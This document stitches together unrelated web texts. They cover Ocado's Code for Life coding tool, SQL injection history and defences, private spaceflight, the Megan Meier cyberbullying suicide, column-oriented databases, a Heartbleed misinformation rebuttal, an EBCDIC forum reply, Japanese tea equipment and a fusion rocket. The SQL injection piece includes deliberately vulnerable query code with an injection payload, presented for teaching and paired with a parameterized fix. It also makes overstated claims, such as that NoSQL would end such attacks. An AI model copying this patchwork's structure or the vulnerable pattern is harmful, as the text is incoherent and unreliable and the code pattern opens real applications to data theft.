But can Ocado’s new Code for Life tool give a helping hand?
With just six weeks until the new computing curriculum is introduced in UK schools, research has revealed that British primary school teachers are not fully prepared to teach their pupils how to code.
The poll of 250 English primary school teachers also reveals that 73% feel they have not been given the necessary resources – such as access to sufficient hardware, software and training – to teach the new Computing curriculum from this September.
To help ready the teachers, Ocado Technology has launched an initiative called Code for Life. Ocado claims Code for Life will help equip pupils with the ‘skills needed to revolutionise the industries of tomorrow’.
Paul Clarke, director of technology at Ocado, said: "As a technology company at its core, Ocado relies on recruiting a constant stream of the brightest and best software engineers and other IT specialists to fuel its continued growth and disruptive innovation.
"We wanted to find a way to give something back by investing in the next generation of computer scientists, while hopefully increasing the number of girls selecting technology subjects.
At the heart of Ocado’s Code for Life tool is the Rapid Router web app. It aims to highlight the everyday application of coding while helping teachers meet the requirements of the new curriculum. It forms the first in a series of educational resources being created by Ocado Technology, based on real-life challenges within its business, to inspire young people to take up a career in computer science.
It will help pupils form a solid foundation to progress to the next level of coding by providing a seamless transition from Blockly, an easy-to-use visual programming language, to Python, a more complex, widely-used programming language. The Python extension will be available later in the academic year in an updated version of the web app, enabling children of mixed abilities and ages to tackle the same problem at different levels.
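The transition described above can be pictured with a toy exercise: the kind of grid-navigation task a pupil might first snap together from Blockly blocks and later retype as Python text. The `Van` class below is purely illustrative; Rapid Router's actual API may differ.

```python
# Hypothetical sketch of a Rapid Router-style exercise in Python.
# (The Van class is invented for illustration; the real app's API may differ.)
class Van:
    def __init__(self):
        self.x, self.y, self.heading = 0, 0, "N"

    def move_forward(self):
        dx, dy = {"N": (0, 1), "E": (1, 0), "S": (0, -1), "W": (-1, 0)}[self.heading]
        self.x, self.y = self.x + dx, self.y + dy

    def turn_right(self):
        self.heading = {"N": "E", "E": "S", "S": "W", "W": "N"}[self.heading]

van = Van()
for _ in range(2):      # the same "repeat 2 times" block a pupil would drag in
    van.move_forward()
van.turn_right()
van.move_forward()
print(van.x, van.y, van.heading)   # -> 1 2 E
```

A mixed-ability class can solve the same route either with blocks or with text like this, which is the point of the Blockly-to-Python progression.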
Paulina Koch, Ocado Technology intern, said: "I’ve been working with developers from across Ocado Technology who’ve volunteered to build this resource after work and at weekends. I’ve loved having the opportunity to work with teachers and pupils to ensure the app delivers exactly what they need. Knowing it will be used by thousands of pupils around the country to gain skills that will benefit their future is a really exciting prospect."
Ever since the advent of computers, there have always been people trying to hack them. William D. Mathews of MIT discovered a flaw in the Multics CTSS password file on the IBM 7094 in 1965; John T. Draper ("Captain Crunch") discovered around 1971 that a cereal-box toy whistle could provide free phone calls; the Chaos Computer Club, the Cult of the Dead Cow, 2600, the infamous Kevin Mitnick, even computing godfather Alan Turing with his World War II German Enigma-cipher-busting Bombe: all of these and more have been hacking computers for as long as computers have existed.
Through the 1980s and 1990s, the world began to see the advent of the personal computer, the internet, and the world wide web. Telephone lines in millions of homes began screaming with the ear-piercing tones of dial up connections. AOL, CompuServe, Juno, and more began providing home users with information portals and gateways to the web. The information age was born; as was the age of information security (and, indeed, insecurity).
The (In)Security Watchmen - OWASP and Others
In December 2001, the Open Web Application Security Project (OWASP) was established as an international not-for-profit organization aimed at web security discussion and improvement. For practically its entire existence, OWASP has kept track of perhaps every type of hack that could be done: social engineering, poor authentication systems, cross-site scripting, SQL injection, general software vulnerabilities, and more. OWASP has tracked them all and encouraged the web community to secure everything as best as possible. As the world wide web grew, attack fashions came and went. Of all the types of security intrusion, however, virtually the only one that has constantly and consistently remained in the top ten is injection (usually SQL injection against databases).
An injection is defined by OWASP as occurring "when untrusted data is sent to an interpreter as part of a command or query." Typically, this grants an attacker unauthorized access to data within a database through a web application, or grants them the ability to insert new or alter pre-existing data. It happens because, quite simply, the web application inserts user input directly into a database query without any sanitization.
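A minimal sketch of that failure mode, using Python's built-in sqlite3 module (the table and data are invented for illustration): the application concatenates user input into the query string, so a crafted value rewrites the query's logic.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

# VULNERABLE: untrusted input is pasted straight into the SQL text.
supplied_name = "nobody' OR '1'='1"
query = "SELECT * FROM users WHERE name = '" + supplied_name + "'"
rows = conn.execute(query).fetchall()
print(rows)   # the injected OR '1'='1' matches every row, leaking alice's record
```

The final query reads `... WHERE name = 'nobody' OR '1'='1'`, a condition that is true for every row in the table.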
Immediately, one thinks: why would anyone allow unsanitized data to enter a database query? Indeed, if we had an answer to this question, we would probably be receiving billion-dollar U.S. Department of Defense contracts right now.
Interlude: What is a SQL Injection?
We want to pause before we continue further and ensure you, our treasured reader, understand what an SQL injection is and the technical aspects behind it. For purposes of brevity and focus, we will assume from here on that you understand the concept of a SQL injection, how it works, and basic ways to prevent it.
If not, first read our article What you need to know about SQL Injection and keep an eye out for our future publications, as we continue to look into this constant security problem. It is important that you understand the technical side behind a SQL injection, as it helps to highlight the simplicity and, indeed, the absurdity of the repetition of this security vulnerability.
Resume Play: A History Lesson about SQL Injection
For as long as relational databases have existed, so too have SQL injection attack vectors. Since 1999, the Common Vulnerabilities and Exposures (CVE) dictionary has existed to keep track of known software vulnerabilities and alert consumers and developers alike. Since 2003, SQL injections have remained in the top 10 of CVE vulnerabilities, with 3,260 such vulnerabilities recorded between 2003 and 2011.
In 2012, a representative of Barclaycard claimed that 97% of data breaches are a result of SQL injections. In late 2011 and early 2012, in the space of just one month, over one million web pages were affected by the Lilupophilupop SQL injection attack. 2008 saw incredible economic disruption as a result of SQL injections. Even the official United Nations website fell victim to a SQL injection attack in 2010.
All these stats (excluding, of course, the CVE count) are from within the past three years. Just three years. It is no surprise, then, that in 2011 the United States Department of Homeland Security, MITRE, and the SANS Institute all named SQL injection the most dangerous security vulnerability. So why, after more than 14 years, is it still a number one, seemingly unfixable, vulnerability?
Low Hanging Fruit Vulnerabilities, Or: By Blunder We Learn ... Or Not
In a recent study at Goldsmiths University of London, a group of researchers came to the conclusion that our brains are hardwired such that we as humans just do not (easily) learn from our mistakes. Perhaps it is simply that developers see and are even fully cognizant of the faults in developing software, but they are mentally incapable of progressing past those recurring gaffes. Perhaps they are not seeing the proverbial forest for the trees or, specifically, they understand the technical details but not the big picture of applying that knowledge.
As far as low hanging fruit goes, SQL injections present themselves as the most likely guarantee an attacker has of easily gaining illegitimate access to a website or other SQL-backed system, simply based on the probability of success, if 14 years of historical statistics are to be believed. This is primarily because of the most obvious problem: We are still using relational SQL databases.
Were we to use NoSQL database systems such as MongoDB or CouchDB, none of these attacks would ever happen, or at least nowhere near as easily or as often as SQL injections. That is not to say that NoSQL is completely and one hundred percent safe, but rather that it would immediately solve the problem of SQL injections.
But that is not the real cause, nor even a reasonably viable solution. The real reason lies in the fact that software and web application developers do indeed seem to bear out the Goldsmiths researchers' conclusion: humans cannot easily learn and adapt once they (or, by observation, others) mess up. It probably does not help that the easiest-to-find and most common material on integrating relational SQL databases with popular languages, such as PHP, almost never demonstrates the proper, safest methods of integration, so perhaps some of the blame also lies in a near-complete lack of valuable educational material. Combine these with over-worked developers granted unreasonable deadlines or requirements, and it makes for a wicked trifecta of low-hanging-fruit vulnerabilities.
Minimal Effort, Easy Reward; Exploiting a "Low Hanging Fruit" Vulnerability
By comparison, a Distributed Denial of Service (DDoS) attack requires careful coordination and the leveraging of hundreds to tens of thousands of compromised systems, whereas a SQL injection attack can be accomplished on a single computer with patience, trial and error, some ingenuity, and a little luck. It really does not take much skill at all to complete a SQL injection attack. In fact, a script kiddie can do so with absolutely no understanding of SQL injection whatsoever, using any of the freely available tools. They truly are that easy.
Perhaps some SQL injection attacks result from lazy development or malpractice, but in reality there are three big, commonly repeated mistakes that allow SQL injections to occur:
Ignorance of the Least Privilege principle
Quite simple, yet frequently ignored, this principle simply states that a user, process, or other entity shall have only the least required privileges necessary to complete its tasks. For example, a log database table does not need DELETE or UPDATE privileges, and yet database administrators commonly grant all privileges possible to a service rather than tailor-fit the permissions to exactly only what is needed.
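The same idea can also be enforced inside an application. As an illustrative sketch, Python's sqlite3 module exposes an authorizer callback that can veto whole statement types, making a logging connection effectively append-only:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE log (ts TEXT, msg TEXT)")

def append_only(action, arg1, arg2, dbname, source):
    # The log service never needs DELETE or UPDATE, so refuse them outright.
    if action in (sqlite3.SQLITE_DELETE, sqlite3.SQLITE_UPDATE):
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

conn.set_authorizer(append_only)

conn.execute("INSERT INTO log VALUES ('2014-05-01', 'login ok')")  # allowed
blocked = False
try:
    conn.execute("DELETE FROM log")                                # vetoed
except sqlite3.DatabaseError:
    blocked = True
print(blocked)   # True: even a successful injection cannot purge the log
```

In a server database the equivalent is a GRANT policy that gives the application account only the statements it needs.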
Conglomeration of Sensitive Data
There is no reason to keep credit card data in the same database as your news articles. There is also no reason to store passwords in plaintext or with poor hashing techniques. If you segment and distribute your data, your database and its contents become a far less valuable target. Would you keep all your belongings in your home, or would you keep some in your safe deposit box?
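On the password point, here is a hedged sketch of salted, slow hashing using only Python's standard library (the iteration count is illustrative, not a production recommendation):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    # A fresh random salt per user defeats precomputed rainbow tables.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100000)
    return salt, digest

def verify(password, salt, digest):
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

salt, digest = hash_password("correct horse")
print(verify("correct horse", salt, digest))  # True
print(verify("wrong guess", salt, digest))    # False
```

Only the salt and digest are stored; if the table leaks, attackers must brute-force each password individually.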
Blindly Trusting Unsanitized User Input
This is why SQL injections happen. When user input is not sanitized, an attacker has the ability to complete a SQL injection attack, amplified by the aforementioned two points. Once an attacker gains access via unsanitized input, availability of sensitive data and unlimited privileges give them everything they could ever want to wreak havoc.
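The standard fix is parameterization: hand the input to the database driver as a bound value rather than splicing it into the SQL text. In this sketch with Python's sqlite3 module, a classic `' OR '1'='1` attack string is treated as an ordinary, non-matching name:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

# SAFE: the driver binds the value; it is never parsed as SQL.
supplied_name = "nobody' OR '1'='1"
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (supplied_name,)
).fetchall()
print(rows)   # -> []  the whole attack string is just an unmatched name
```

Every mainstream database driver offers an equivalent placeholder mechanism, so there is rarely a good excuse for string concatenation.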
That is it. Just three simple problems have caused over one million web pages to be compromised in under a month, claimed the United Nations' site and several other high-profile websites, and consistently kept SQL injections in OWASP's top ten list. It is almost absurd, given how simple these three problems are, that SQL injections keep happening. So what can developers do?
Later in our series of SQL injection articles, we will go over more technical details of a SQL injection attack and how to protect against them. But for now, the most important point we can stress is that developers and systems administrators must not fall prey to the three problems we have mentioned. Developers need to ensure they implement the least privilege necessary for a web application's needs, segregate or encrypt data such that a database becomes a far less valuable target, and, most importantly, always sanitize user input! These are incredibly simple techniques that, if applied as consistently as SQL injections rank in the top ten list, can potentially eliminate SQL injections from that top ten list for the first time since it was created.
Automatically Detect SQL Injection Vulnerabilities in your Web Applications
One easy and quick way to check if your websites and web applications are vulnerable to SQL Injection is by scanning them with an automated web application security scanner such as Netsparker.
Netsparker is a false positive free web application security scanner that can be used to identify web application vulnerabilities such as SQL Injection and Cross-site scripting in your web applications and websites. Download the trial version of Netsparker to find out if your websites are vulnerable or check out the Netsparker product page for more information.
Following NASA's Lead
By Larry Dignan | Posted 2005-08-31
The UPS Brown Voyager? It could happen if private companies take over low-earth space travel and free up NASA to shoot for the stars.
Meyers hopes to use NASA's suppliers to build what would be a second-generation space shuttle to ferry space-station components, cargo and people into space. The company's shuttle—pending $5 billion to $7 billion in funding—would be built on NASA's work on the Delta Clipper, an experimental vehicle shelved in July 1997, and the X-33, which was scrapped in March 2001.
"The problem with the shuttle was that it was a 30-year prototype," Meyers says. "There were never second and third generations that improved on the first shuttle."
Clint Wallington, a professor at the Rochester Institute of Technology, says it remains to be seen whether there's a payoff from transferring NASA's knowledge of astronaut training, supplier contracts and operating launch facilities.
"You can transfer it all [to the private sector], but at what cost?" Wallington says. "You can give away the launch facilities and everything, and it could still take $250 million to do a launch. If you get seven passengers paying $20 million each, you're still [more than] $100 million short."
Challenge: Making a business case
Solution: Push tourism. Find multiple
According to Beichman, engineering a commercial manned space flight is nothing compared to making a profit. "It's not obvious where the money is going to be made," he says.
Will Whitehorn, president of Virgin Galactic, British entrepreneur Richard Branson's effort to launch space tourism, says business cases will emerge. In July, Virgin Galactic and Scaled Composites, a Mojave, Calif.-based aerospace design company, announced a joint venture to build a spaceship that could take two pilots and seven passengers into a sub-orbital flight (minimum of 62 miles above Earth). The service, initially targeted for 2008, will cost $200,000 a person for a nearly three-hour trip after three days of training.
"In five to six years, we hope to get that down to $100,000," Whitehorn says.
Whitehorn envisions a trip where passengers can see Earth at the edge of space, float around the cabin and see some stars along the way.
Virgin's partner, Scaled Composites founder Burt Rutan, built SpaceShipOne, which in October 2004 reached a height of 69.6 miles to collect the $10 million Ansari X Prize, an award for the first spacecraft to reach 328,000 feet twice within 14 days.
Next up: Develop SpaceShipTwo, which will carry people and payload for Virgin Galactic, and then build SpaceShipThree, which will be an orbiting craft, according to Whitehorn.
Megan Meier was just twelve years old when the events began that would ultimately lead to her death. Like many teenagers, Megan had accounts on common social networks, including MySpace, where she first met “Josh Evans”. Ostensibly a sixteen-year old boy, “Josh” was actually an accumulation of Sarah, an old friend of Megan’s, Sarah’s mother, Lori Drew, and Ashley, a teenage employee of Drew’s. Megan and “Josh” became online friends, and her family were pleased that she seemed generally happier. However, on Monday, 16th of October, 2006, “Josh” sent a message to Megan stating that he no longer wished to continue their friendship. “The world would be a better place without you”, he claimed. Some of the private messages Megan had sent during the course of their online acquaintanceship were posted publicly, and defamatory bulletins were written about her and shared with other members of the site.
Shortly after the friendship came to an end, Megan was found hanged in her bedroom closet.
What moves people to do such things? How big a problem is cyberbullying? And what, if anything, can be done about it?
Bullying is nothing new in our society. In schools and workplaces around the world, some individuals are victimised by people who gain self-validation by bringing others down. With the invention of the internet, however, bullying has taken on a whole new dimension. Now it doesn’t stop in the schoolyard or on the walk home from work; it carries on in your bedroom, sits on your sofa with you when you’re holding your smartphone, and even takes place in your absence, only to be discovered when you next log on.
But isn’t it different from “normal” bullying? Surely, some argue, it must be possible for people to just not have a social networking account, or to change their email address, or just to read a book in the evening instead of turning on the computer?
Perhaps. But in today’s society, technology is everywhere, and setting yourself apart from it can put you at a disadvantage both personally and professionally. For many people today, the line between online and offline life isn’t just blurred, it’s non-existent. Your smartphone alarm wakes you up, and you check your email before you get out of bed. On the way to work, your friends ping messages at you through social networking applications. At work, your inbox fills with business and personal messages. When you go home, you turn on your connected TV and watch it whilst absent-mindedly scrolling through your favourite websites. In this kind of world, cyberbullying isn’t confined to some other realm; it’s going everywhere with you, all the time. And cyberbullying is notoriously difficult to investigate; for one thing, legal jurisdiction in cybercrime is not always easily defined. Cyberbullies may go to great lengths to protect their online anonymity, using public computers and anonymous email resenders to ensure that their own name is not tied to any of the acts.
Carole Phillips is a trustee for BulliesOut, a charity that works to combat bullying both online and offline. She is also a child protection officer who teaches children about Internet safety. We asked her how large a problem cyberbullying really is in today’s society.
“The media attention given to the tragic cases such as the suicide of Hannah Smith and Daniel Perry is only the tip of the iceberg. Ask any school today and they will tell you that at the root cause of any falling out with friends or any bullying problem, you will soon uncover that [social networking sites] are at the centre of the dispute.
Young people today are known as digital natives because they have been raised on the emergence of technology and are very adept at getting to grips with anything new that would take the older generation a little longer to grasp. And therein lies the problem: unless we are professionals who work with young people or in the field in which social media is part of our world too, there has not been the same level of understanding of how social media works and impacts on young people’s lives. With no boundaries or little understanding about ‘how things work’, young people are playing in a lawless society online without the emotional capacity or maturity to deal with issues when things go wrong or an adult to steer them in the right direction.”
A sobering thought. So what can be done? Phillips elaborates:
“In order to move forward and equip people who use social media with the tools to deal with it when things get out of hand, adults such as educators, social workers, youth workers and most importantly parents, need to get to grips with exactly what their children are exposed to, instill levels of morality in them and remind young people over and over again that they should not act online in a way that they would not act in the real world. If you were made to say nasty, vile comments to someone’s face as opposed to someone online, I think you would think twice as you no longer have the veil of anonymity to hide behind.
Schools have a big role to play. Educate all staff on social media, not just ICT teachers or child protection officers; make it a whole school approach and learn how to recognise when things are not going well. Engage parents in training and work together with them and share the responsibility of working together to safeguard young people. Most importantly, teach young people about the consequences of using social media in a negative way as your digital footprint is there forever and you leave a trail behind you that you may not want people to see not only now, but in years to come, be it your parents, families and friends but also potential future employers. The message I would say to all users is act responsibly as you cannot use technology as a way to behave in a way you would not if it did not exist."
It is evident that cyberbullying is a growing issue in today’s society. Anonymity online can be misused to threaten and victimise others, particularly young people who may spend a lot of time on the Internet and feel high levels of pressure to fit in with their peer group. As digital forensics professionals, the best we can do reactively is to ensure our investigations are thorough and adept. But as Phillips points out, the way to prevention is through education; people need to understand more about the repercussions of their own actions online, and know what to do if they or someone they know are feeling threatened by another party’s online behaviour.
If you are concerned about issues related to cyberbullying, the following organisations can help:
Orbital Sciences this morning successfully launched its Antares rocket carrying the company's Cygnus cargo spacecraft on a demonstration mission to resupply the International Space Station.
The launch represents the second major private unmanned space system to successfully blast into space, and the first launched from NASA's Wallops Island, Va., facility. The company joins Space Exploration Technologies (SpaceX), whose Falcon 9 rocket and Dragon spacecraft flew the first successful private mission in May 2012. Unlike the reusable Dragon, however, Cygnus will not make a trip back to Earth; it will be discharged from the ISS and sent to burn up in the Earth's atmosphere.
According to NASA, traveling 17,500 mph in Earth's orbit, Cygnus successfully deployed its solar arrays and is on its way to rendezvous with the space station Sunday, Sept. 22. The spacecraft is set to deliver about 1,300 pounds (589 kilograms) of cargo, including food and clothing, to the Expedition 37 crew, who will grapple and attach the capsule using the ISS' robotic arm.
But first it will have to prove itself, so over the next few days Cygnus will perform a series of maneuvers to test its systems, ensuring it can safely enter the so-called "keep-out sphere" of the space station, a 656-foot (200-meter) radius surrounding the station.
This demonstration flight is the final milestone in Orbital's Commercial Orbital Transportation Services (COTS) joint research and development initiative with NASA. Under the COTS program, which began in 2008, NASA and Orbital developed Cygnus, which meets the stringent human-rated safety requirements for ISS operations. Orbital also privately developed the Antares launch vehicle to provide low-cost, reliable access to space for medium-class payloads, Orbital stated.
Pending the successful completion of the COTS program, Orbital will begin regularly scheduled cargo delivery missions to the ISS under its $1.9 billion Commercial Resupply Services (CRS) contract with NASA. Under the CRS contract, Orbital will deliver approximately 20,000 kilograms of net cargo to the ISS over eight missions through 2016. For these missions, NASA will manifest a variety of essential items based on ISS program needs, including food, clothing, crew supplies, spare parts and equipment, and scientific experiments.
1. Reduced data footprint
In recent years, column-oriented databases have been noted by many as the preferred architecture for high-volume analytics. A column-oriented database stores data column by column instead of row by row. There are many advantages to this. Most analytic queries only involve a subset of the columns in a table, so a column-oriented database focuses on retrieving only the data that is required. This speeds queries and reduces disk I/O and computer resources.
Furthermore, these databases enable efficient data compression because each column stores a single data type, as opposed to rows that typically contain several data types. Compression can be optimized for each particular data type, reducing the amount of storage needed for the database. Column orientation also greatly accelerates query processing, which significantly increases the concurrent queries a server can process.
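The two ideas above, column-wise storage and per-column compression, can be sketched in a few lines. This toy illustration resembles no particular product's engine; it only shows why single-type columns compress well and why a query can skip columns it does not need.

```python
# Store a small table column by column instead of row by row.
rows = [("2014-01-02", "UK", 120),
        ("2014-01-02", "UK", 95),
        ("2014-01-02", "FR", 210),
        ("2014-01-03", "FR", 40)]

columns = {name: [r[i] for r in rows]
           for i, name in enumerate(["date", "country", "amount"])}

def rle(values):
    # Run-length encoding: repeated values in a single-type column
    # collapse into (value, count) pairs.
    out = []
    for v in values:
        if out and out[-1][0] == v:
            out[-1][1] += 1
        else:
            out.append([v, 1])
    return out

# A query touching only 'amount' never reads the other columns.
print(sum(columns["amount"]))      # 465
print(rle(columns["country"]))     # [['UK', 2], ['FR', 2]]
```

Sorted, low-cardinality columns like dates and country codes are where real column stores achieve their largest compression ratios.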
There are a variety of column-oriented solutions on the market. Some duplicate data and require as large a hardware footprint as traditional row-based systems. Others have combined the column basis with other technologies, which eliminates the need for data duplication. This means that users don't need as many servers or as much storage to analyze the same volume of data.
For example, some column-oriented databases can achieve compression ratios ranging from 10:1 (a 10TB database becomes a 1TB database) to more than 40:1, depending on the data. With this level of compression, a distributed server environment can be reduced by a factor of 20 to 50 and potentially brought down to a single box, slashing heat, power consumption and carbon emissions.
Virtual data marts are also coming on the scene, leveraging Enterprise Information Integration (EII) technologies to create specialized views of data sets without the need for physical storage. The downside to this approach is that complex queries can be sluggish, which can be a problem when analytic needs call for close to real-time insight.
Open-source software takes efficient resource utilization a step further as it typically does not require proprietary hardware or specialized appliances.
The Heartbleed vulnerability has created a massive news cycle, and generated technical risk-based discussions that might actually do some good. But some of these discussions boggle the mind, spreading misinformation in order to generate clicks or sales.
When security issues hit the mass media, such as Heartbleed, there is a good deal of Fear, Uncertainty, and Doubt – better known as FUD – that gets promoted on the airwaves and in print.
"Police say Canadian man used Heartbleed virus to steal personal info
"Heartbleed virus: Changing your password may not eliminate risk"
These headlines promote FUD because Heartbleed isn't a virus. Heartbleed is a vulnerability in libssl (the portion of OpenSSL supporting TLS). They're just two examples, but several news agencies have allowed the term virus to be attached to Heartbleed. That's unfortunate. There is no way someone can send you a file and infect you with Heartbleed.
In the business world, issues like Heartbleed can cause headaches and panicked discussions, as business leaders attempt to understand the bigger picture. This leaves some security professionals caught in an endless loop of explaining the problem while removing false notions.
The latest false Heartbleed notion was pitched to me earlier this month.
"Many organizations were not ready for Heartbleed, and sadly, many will likely not be ready for its mutations. Vulnerabilities like Heartbleed take advantage of an overreach flaw in the SSL heartbeat protocol and the truth is that there will be unknown mutations that might force you to reactively patch your devices, effecting the network or server's performance, privacy, and trust." - Chris Chapman, Technical Manager at Spirent
There will be no mutations of Heartbleed. This claim is as misguided as calling it a virus. The reason there can be no mutation is simple: Heartbleed is a single vulnerability that affects a subset of libssl deployments.
Those who used a vulnerable version of OpenSSL with the heartbeat option enabled were in trouble; those who didn't use OpenSSL, or who used it without the heartbeat option, were not affected by this flaw.
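For intuition, here is a deliberately simplified Python simulation of the bug's shape (the real flaw lives in OpenSSL's C heartbeat handling, not in code like this): the server echoes back as many bytes as the request claims to contain, never checking the claim against the payload actually received.

```python
# Toy model of a heartbeat over-read; the bytes beyond the 4-byte payload
# stand in for whatever happened to sit next to it in the real process.
server_memory = bytearray(b"PING" + b"\x00" * 4 + b"secret-session-key")

def heartbeat_response(payload_offset, claimed_len):
    # Flawed: trusts claimed_len instead of the actual payload length (4).
    return bytes(server_memory[payload_offset:payload_offset + claimed_len])

print(heartbeat_response(0, 4))    # b'PING'  -- an honest request
print(heartbeat_response(0, 26))   # the echo drags adjacent "memory" along
```

The fix was equally simple in shape: compare the claimed length against the bytes actually received, and discard the request if they disagree.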
Spirent also listed five items of note as related to Heartbleed and the products / services they are trying to promote. I've listed all five below, with additional commentary.
5. Web servers may still be vulnerable to Heartbleed.
Rapidly deployed and inadequately tested security patches from the system vendors means that many devices and networks may still be susceptible to Heartbleed and its variations.
The patches and mitigation steps needed to address the Heartbleed vulnerability were documented and tested before being released to the public. Administrators were encouraged to weigh their options and to patch as appropriate. Most did, but others didn't need to patch as they didn't use OpenSSL, or they recompiled and disabled heartbeat until they could investigate further.
There were problems with some of the fixes released by infrastructure firms, but those were quickly addressed and no one suffered because of them. At best, Heartbleed patching caused short bursts of downtime that fall well within most SLAs.
In fact, the aftermath of the Heartbleed issue has led to additional development, including a fork of the OpenSSL project. Even better, the Linux Foundation has secured resources from the Web's largest firms in order to address security in various open source projects; the first recipient will be OpenSSL itself.
4. Heartbleed will mutate.
Heartbleed will likely mutate into hundreds or even thousands of variants. Software patches may not mitigate upcoming attacks.
No. Again, Heartbleed cannot mutate. This will not happen. Your server or product is either vulnerable to Heartbleed, or it isn't. End of story. If it is vulnerable, patch it. Patching against Heartbleed is exactly how you mitigate against such a vulnerability.
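Determining whether you need that patch is mechanical: the affected OpenSSL releases were 1.0.1 through 1.0.1f (fixed in 1.0.1g), and builds compiled without heartbeat support were never exposed. The hypothetical helper below sketches that check; it deliberately ignores the 1.0.2 beta releases, which were also affected.

```python
def is_heartbleed_vulnerable(version: str, heartbeats_enabled: bool = True) -> bool:
    """Rough check of an OpenSSL version string against the Heartbleed range.

    Affected: 1.0.1 through 1.0.1f; fixed in 1.0.1g. Builds compiled with
    -DOPENSSL_NO_HEARTBEATS are safe regardless of version. (The 1.0.2
    betas, also affected, are ignored in this sketch.)
    """
    if not heartbeats_enabled:
        return False
    if not version.startswith("1.0.1"):
        return False          # 0.9.8, 1.0.0 and 1.0.2+ final were not affected
    suffix = version[len("1.0.1"):]   # "", "a".."f" vulnerable; "g" and later patched
    return suffix == "" or suffix <= "f"

print(is_heartbleed_vulnerable("1.0.1e"))  # True  -- patch it
print(is_heartbleed_vulnerable("1.0.1g"))  # False -- already fixed
print(is_heartbleed_vulnerable("0.9.8y"))  # False -- never had the bug
```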
3. Multiple software patches can be a weak link.
Most organizations will have multiple devices requiring patches that may not all work together and inadvertently expose the network further.
2. Patches may break performance.
Urgently applied Heartbleed patches may impact network performance and quality of experience (QoE) of the IT networks.
Heartbleed doesn't have multiple patches. It is a single vulnerability; therefore it has a single patch. If the server or product is vulnerable, patch it with the proper fix from the vendor.
But again, in the security world, the majority of administrators test their patches first and deploy widely second. If something breaks, they have the ability to reverse the process. Heartbleed patching is, at its core, no different from patching an Internet Explorer vulnerability.
1. Heartbleed-like vulnerabilities could happen in any protocol.
While Heartbleed is a SSL/TCP flaw there are other protocols such as TCP, HTTP are just as susceptible, so preparing for that eventuality is critical.
I'm assuming this is a typo, as Heartbleed impacts SSL/TLS. Either way, lumping in generic protocols like TCP and HTTP is a bit unfair and serves little purpose.
In response to massive criticism over the aforementioned five points, Chris Chapman published a blog clarifying his company's position.
"There are many ways of mutating attacks – the specific danger we wanted to address was technique mutation. Specifically when a pathway of attack works, malicious entities take that technique and apply it to other state machines, both close and distant to the original state machine, in an attempt to find other pathways of entry. Furthermore, variants of the technique may also attempt to gain entry. Together, these techniques of entry hunt for weaknesses in the protocol. In fact, we have already seen this happen."
Chapman cited a recent Mandiant post about how attackers exploited Heartbleed to hijack VPN sessions and bypass two-factor authentication as an example of what he's describing.
However, the VPN concentrator that Mandiant discusses was vulnerable to Heartbleed, so the criminals exploited that vulnerability and compromised VPN accounts. How did the company address the issue? They patched the VPN concentrator against the Heartbleed flaw.
In concluding his clarification, Chapman added:
"These are examples of how hackers are using the Heartbleed techniques in a slightly different way to successfully find new holes. There is also no reason why the exact technique of Heartbleed must be static. Small or large, technique changes (mutations) could also pose a threat."
That's the problem. They're not finding new holes. They're exploiting a single hole on multiple surfaces. Heartbleed is the vulnerability; if servers and other devices are patched against it, then it's no longer an issue.
as long as data is stored on any medium, it is just a sequence of bits organized into larger entities according to the hardware architecture;
the definition of its nature is a convention according to the use you make of the data itself.
let's take an example for 8 bits:
bit sequence 1100 0001
hexadecimal representation "c1"
numeric value 193
alphanumeric value "A" (in EBCDIC)
so the fact that a sequence of bits represents a packed-decimal number cannot be made into a bidirectional assumption
for example ( in hexadecimal representation )
x"000C" can be interpreted as the packed-decimal value zero,
or simply as a binary value of 12
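Both examples can be checked in a few lines of Python (assuming the EBCDIC character set this forum concerns, available as the cp037 codec; the packed-decimal decoder is a minimal sketch, not a full COMP-3 implementation):

```python
# One byte, three readings (the example above: 1100 0001):
b = bytes([0b11000001])
print(hex(b[0]))              # 0xc1  -- hexadecimal representation
print(b[0])                   # 193   -- unsigned numeric value
print(b.decode("cp037"))      # 'A'   -- EBCDIC alphanumeric value

# Two bytes x"000C": plain binary 12, or packed decimal +0.
pd = bytes([0x00, 0x0C])
print(int.from_bytes(pd, "big"))   # 12 as a binary halfword

def unpack_packed_decimal(data: bytes) -> int:
    """Minimal packed-decimal decoder: digit nibbles followed by a sign nibble."""
    nibbles = []
    for byte in data:
        nibbles += [byte >> 4, byte & 0x0F]
    *digits, sign = nibbles
    value = int("".join(map(str, digits)))
    return -value if sign == 0x0D else value   # 0xD = negative; 0xC/0xF = positive

print(unpack_packed_decimal(pd))   # 0 as a packed decimal
```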
All this to say that your request is not clear enough
Tea Ceremony
Equipment For Japanese Tea Ceremony
The Kama is a container which holds water.
Mizushashi is a jug used to hold water for washing; it also holds the water used for boiling.
Kensui is a container used to hold the water used to wash the tea bowls.
Chawan is the tea bowl.
Usuki, or natsume, is a lacquerware container for usucha, or powdered tea.
Hishaku is a ladle for pouring water.
Scientists at the University of Washington are working on a rocket that they say could enable astronauts to reach Mars in just 30 days.
NASA has estimated that, using current technology, a round-trip human mission to Mars would take more than four years.
In addition, such a trip would require significant amounts of very expensive chemical rocket fuel. The launch costs alone would add up to more than $12 billion, according to the university.
A team of University of Washington researchers and engineers is building components of a nuclear fusion-powered rocket that they say could clear many of the hurdles that block deep space travel, including the long estimated travel times, the exorbitant costs and the health risks associated with spending months in a cramped space capsule.
"Using existing rocket fuels, it's nearly impossible for humans to explore much beyond Earth," said John Slough, a University of Washington research associate professor of aeronautics and astronautics. "We are hoping to get a much more powerful source of energy that could eventually make interplanetary travel commonplace."
If the research team can build components for a fusion-powered rocket, Slough said it could lead to both 30- and 90-day expeditions to Mars.
While NASA has robotic rovers working on Mars today, the space agency has long looked to build a human outpost there.
In 2004, President George W. Bush called on NASA to send humans back to the moon by 2020. He said that effort would be done to prepare for a manned-mission to Mars.
